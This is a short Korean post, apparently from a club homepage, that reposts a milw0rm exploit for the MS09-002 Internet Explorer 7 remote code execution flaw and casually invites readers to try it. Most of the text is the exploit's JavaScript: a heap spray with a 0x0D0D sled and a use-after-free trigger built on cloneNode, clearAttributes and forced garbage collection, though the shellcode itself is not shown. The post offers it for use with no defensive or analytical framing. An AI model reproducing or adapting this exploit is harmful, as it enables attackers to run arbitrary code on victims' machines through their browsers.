동아리 홈페이지에 올라온 글 ㅋㅋ 테스트 한번 해봐야지 ㅋㅋ ㄱㄱ
MS09-002 IE7 취약점을 이용한 Exploit 코드가 milw0rm에 떴네요.
Remote code execution이 가능한 크리티컬 취약점입니다.
심심하시면 놀아보세염~
주소 : http://www.milw0rm.com/exploits/8079/
*취약점 코드*/
var array = new Array(); //Don't need change but for execute time you can change ;) var calc = 0x100000-(shellcode.length*2+0x01020); // Spray or Not :-?? var point = unescape("%u0D0D%u0D0D"); while(point.length<calc) { point+=point;} var sec = point.substring(0,calc/2); delete point; for(i=0; i<0xD0; i++) { array[i] = sec + shellcode; } // N/A Code CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<500;x++) a1.push(document.createElement("img")); o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; </script> # milw0rm.com [2009-02-20] |